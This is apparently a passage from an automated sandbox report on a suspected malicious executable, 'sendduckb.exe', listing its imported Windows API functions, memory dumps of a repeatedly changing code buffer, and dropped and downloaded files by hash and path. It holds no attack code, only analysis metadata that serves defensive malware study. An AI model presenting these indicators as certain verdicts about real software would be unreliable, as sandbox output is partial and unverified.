WSACleanup | 0x74 | 0x100001230 | 0xff28 | 0xf328 | - |
WSAGetLastError | 0x6f | 0x100001238 | 0xff30 | 0xf330 | - |
ole32.dll (6)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CoTaskMemFree | 0x0 | 0x1000013b8 | 0x100b0 | 0xf4b0 | 0x6c |
CoTaskMemAlloc | 0x0 | 0x1000013c0 | 0x100b8 | 0xf4b8 | 0x6b |
CoUninitialize | 0x0 | 0x1000013c8 | 0x100c0 | 0xf4c0 | 0x70 |
CoInitializeEx | 0x0 | 0x1000013d0 | 0x100c8 | 0xf4c8 | 0x43 |
CLSIDFromString | 0x0 | 0x1000013d8 | 0x100d0 | 0xf4d0 | 0xc |
CoCreateInstance | 0x0 | 0x1000013e0 | 0x100d8 | 0xf4d8 | 0x14 |
OLEAUT32.dll (2)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SysAllocString | 0x2 | 0x1000011b0 | 0xfea8 | 0xf2a8 | - |
SysFreeString | 0x6 | 0x1000011b8 | 0xfeb0 | 0xf2b0 | - |
ntdll.dll (3)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
RtlCaptureContext | 0x0 | 0x100001398 | 0x10090 | 0xf490 | 0x27b |
RtlLookupFunctionEntry | 0x0 | 0x1000013a0 | 0x10098 | 0xf498 | 0x401 |
RtlVirtualUnwind | 0x0 | 0x1000013a8 | 0x100a0 | 0xf4a0 | 0x4f0 |
WSOCK32.dll (2)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
ord1141 | 0x475 | 0x100001248 | 0xff40 | 0xf340 | - |
ord1142 | 0x476 | 0x100001250 | 0xff48 | 0xf348 | - |
Memory Dumps (9)
»
Name | Process ID | Start VA | End VA | Dump Reason | PE Rebuild | Bitness | Entry Point | AV | YARA | Actions |
---|---|---|---|---|---|---|---|---|---|---|
buffer | 22 | 0x140000000 | 0x140022FFF | First Execution | 64-bit | 0x140006B54 |
sendduckb.exe | 22 | 0xFF7E0000 | 0xFF7F5FFF | Relevant Image | 64-bit | - |
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x140007784 |
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x14000A9F8 |
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x14000B9B4 |
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x14000C5E0 |
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x14000D88C |
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x1400046C0 |
buffer | 22 | 0x140000000 | 0x140022FFF | Content Changed | 64-bit | 0x140005600 |
c:\users\aetadzjz\appdata\local\temp\~df5c3c42457c3f014b.tmp | Dropped File | Unknown |
Unknown
|
»
c:\users\aetadzjz\appdata\local\temp\~df207c8c2a9159a39e.tmp | Dropped File | Unknown |
Unknown
|
»
11a8f947339d30605a086d0c8865366567767e0354baaf83a941c484b7cb297b | Downloaded File | Text |
Unknown
|
»
2378505ba90d0efce5aad0e99f7404aeefea38e63d2143b55c36329a3b6f0565 | Downloaded File | Text |
Unknown
|
»
2637cb9ee46cc3256cd8577abfc931afd12a96f9981b3fd5827227cf0ba12cd6 | Downloaded File | Stream |
Unknown
|
»
2e938bc4a4775df9b8d1200c344378e26384af7577fd8c2d382be2276671f74b | Downloaded File | Stream |
Unknown
|
»
71f317489fbcb825c6bdf67306ec7bbfb0b633d36a3ed6fb3d98e41f013c0ae5 | Downloaded File | Stream |
Unknown
|
»
C:\Users\aETAdzjz\AppData\Local\sendduck\sendduck.exe | Downloaded File | Binary |
Unknown
|
»
8e1ae0723fecadc45d941aecb35a413a7d262fa8bb4a83a85a6a2a9b53b93867 | Downloaded File | Stream |
Unknown
|
»
9cf8b440553c89e47b7a895540e1f03075b7f15bea22ae8a228133a7e0555006 | Downloaded File | Text |
Unknown
|
»
b76e9f86695cd63c763553bd860c3bf7918a7971160bc1bac7b054ad058f2648 | Downloaded File | Text |
Unknown
|
»
bc695b3c606220452b883b30a00834c047a64a8f9fcd9345be7fe7dd80cb3d9a | Downloaded File | Text |
Unknown
|
»
c87760958d4fe8a3a8c51760f0fd445e65028fcfea3010263a59cd84e724cf15 | Downloaded File | Stream |
Unknown
|
»
ed0031bde979f0f8c7373c948c6383539e092da37c2fa5a1461ccf039c640143 | Downloaded File | Stream |
Unknown
|
»
f80bef0f7aed816867b8c49775c3c387fdb22ce02caef5e59d3c2fe9b5abcaa5 | Downloaded File | Text |
Unknown
|
»
C:\Users\aETAdzjz\AppData\Local\Temp\D2A9.tmp | Dropped File | Unknown |
Not Queried
|
»